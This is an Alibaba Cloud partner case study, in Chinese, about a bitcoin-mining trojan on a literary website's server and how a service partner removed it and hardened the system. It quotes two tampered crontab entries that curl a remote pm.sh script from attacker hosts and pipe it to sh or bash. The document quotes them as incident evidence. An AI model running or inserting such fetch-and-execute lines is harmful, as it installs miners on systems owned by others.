资源消耗异常,竟是因为比特币挖矿木马

简介: 上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-600美元的比特币赎金,成为刷屏级新闻。然而你知道,除了勒索病毒,比特币还有挖矿木马吗?

上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-
600美元的比特币赎金,成为刷屏级新闻。
_
比特币是一种网络虚拟货币,主要基于一套密码编码、通过复杂算法产生,任何人都可以下载运行比特币客户端参与制造比特币,这个过程也被形象地称为“挖矿”。而比特币“挖矿木马”,就是由黑客通过木马控制大量肉鸡电脑,为其制造比特币的恶意程序。
2888371

                                   警方缴获的比特币“挖矿机”

阿里云服务的客户中,就有中过招的。
北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版和营销推广的现代化综合性文化产业机构,其旗下子公司北京酷读文化有限公司,负责运营网络文学网站——酷读网,签有国内知名的网络作家,颇具影响力。
在2016年11月份,网站开始出现CPU、内存资源消耗异常,网站响应速度变慢,而用户访问量没有明显变化。技术团队几经排查处理,仍不能消除故障。新华先锋希望找到专业运维人员,一来快速解决问题,恢复网站正常运营,二来长期为网站保驾护航,保障系统稳定,自身集中精力拓展业务。

多方考察,选择了阿里云生态服务合作伙伴博伟来提供服务保障。通过技术诊断,发现网站遭到了“比特币挖矿木马”的入侵。有些木马病毒的高级版本,可以篡改Linux的基础命令,技术人员很难用一般的方法找到木马进程。技术人员需要结合运维经验、网上的资料、用户故障时间点和系统log分析等综合手段才能定位问题。

新华先锋中的木马就是如此。黑客利用系统漏洞,通过web脚本植入该木马,盗用服务器资源进行比特币开采计算。通过下载并分析该木马脚本文件,博伟技术人员发现该木马修改了系统登录认证配置、计划任务、创建采矿进程进行数据接收和处理,同时伪造系统服务,充当守护进程。
l 被篡改的计划任务:
/10 * curl -fsSL http://www.haveabitchin.com/pm.sh?1116 | sh
1
/1 * root curl -fs http://101.55.126.66:8990/pm.sh | bash
2
l 木马文件:
3
l 木马守护进程:
4
l 被篡改的SSH配置:
5
博伟技术人员指导新华先锋完成数据备份,清理了木马进程、守护进程,恢复被篡改的配置文件和计划任务等,在系统恢复正常后进行了一系列加固操作:缓存数据库Redis、IP绑定/密码验证/更换端口、ROOT登录限制/密码修改、Mysql、FTP、SSH端口更换、IPtable访问控制,阿里云ECS实例的安全组IP/端口限制/快照备份。

好在该木马只是利用服务器资源进行计算,并没有盗用或毁坏用户数据,由于及时查杀木马修复漏洞,避免了用户资料泄露和加密敲诈勒索等更严重的后果。

经过此次故障处理及技术人员的日常巡检,现在用户系统运行平稳。博伟也一直在给新华先锋提供7*24小时的运维保障,让新华先锋得以专注自己的业务,在文化出版领域一展拳脚。

想要更多了解生态合作伙伴提供的服务内容,
欢迎进入阿里云官网-支持-区域服务查看!链接:https://www.aliyun.com/support/quyu

相关文章
|
2月前
|
缓存 监控 安全
服务器荣获挖矿病毒,该如何处理?
【9月更文挑战第2天】若服务器不幸感染挖矿病毒,应立即断开网络连接,防止扩散;使用监控工具查找异常进程和文件,并全面扫描确认位置;谨慎删除病毒文件和进程,修复系统漏洞,安装最新补丁;加强安全防护,安装杀毒软件和防火墙,监控性能活动;最后从备份恢复数据,测试服务功能,确保正常运行。处理过程需谨慎耐心,强化安全管理。
455 3
|
安全 NoSQL JavaScript
糟糕!我的服务器CPU被黑客挖矿了
糟糕!我的服务器CPU被黑客挖矿了
273 0
|
存储 安全 算法
locked勒索病毒利用零日漏洞,企业服务器数据瞬间遭受致命加密
近日,网络安全界再次爆发了一起令人震惊的事件,一种名为"Locked"的勒索病毒利用软件中的零日漏洞,迅速传播并瞬间加密了大量企业服务器。这一事件引发了广泛的关注和恐慌,暴露出网络安全的脆弱性和企业在面对新兴威胁时的不足之处。91数据恢复在本文将对这一事件进行深入分析,探讨相关的影响和可能的防范措施。
locked勒索病毒利用零日漏洞,企业服务器数据瞬间遭受致命加密
|
监控 安全
【号外】-watchbog挖矿中毒记
阿里云服务器CPU负载达到90%以上,云监控频繁报警,过段时间服务器死机
【号外】-watchbog挖矿中毒记
|
监控 安全 NoSQL
记一次服务器被挖矿木马攻击的经历
利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,于是赶紧采取办法~
记一次服务器被挖矿木马攻击的经历
|
缓存 安全 关系型数据库
服务器被挖矿木马攻击该怎么处理
正月里来是新年,刚开始上班我们SINE安全团队,首次挖掘发现了一种新的挖矿木马,感染性极强,穿透内网,自动尝试攻击服务器以及其他网站,通过我们一系列的追踪,发现了攻击者的特征,首先使用thinkphp远程代码执行漏洞,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行攻击网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行攻击脚本,注入挖矿木马,对一些服务器的远程管理员账号密码,mysql数据库的账号密码进行暴力猜解。
520 0
服务器被挖矿木马攻击该怎么处理
|
安全 NoSQL Shell
服务器挖矿木马解决办法与预防措施
服务器挖矿木马在17年初慢慢大规模流行,hack利用网络入侵控制了大量的计算机,在移植矿山计划后,利用计算机的CPU和GPU计算力完成了大量的计算,获得了数字加密货币。17年慢慢爆炸后,挖矿木马慢慢变成互联网的主要危害之一。网站服务器如果被挖矿木马团伙攻陷,正常业务服务的性能将遭受严重影响,挖矿木马会被感染,也代表着网站服务器权限被hack攻陷,公司的机密信息可能会泄露,攻击者也可能同时彻底破坏数据。
541 0
服务器挖矿木马解决办法与预防措施
|
安全 NoSQL 应用服务中间件
记一次服务器被植入挖矿木马cpu飙升200%解决过程
线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。突然一则噩耗从前线传来:网站不能访问了。 此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。
6402 0
|
安全 网络安全 网络架构
如何最大限度地减少DDOS攻击的危害
如何最大限度地保护企业服务器?如果我们无法阻止这种攻击,可以采取哪些措施?分布式拒绝服务(DDoS)是一种完全不同的攻击,你阻止不了黑客对你这么做,除非您主动断开与互联网的连接,否则它会对你的网站发起DDoS攻击。
1471 0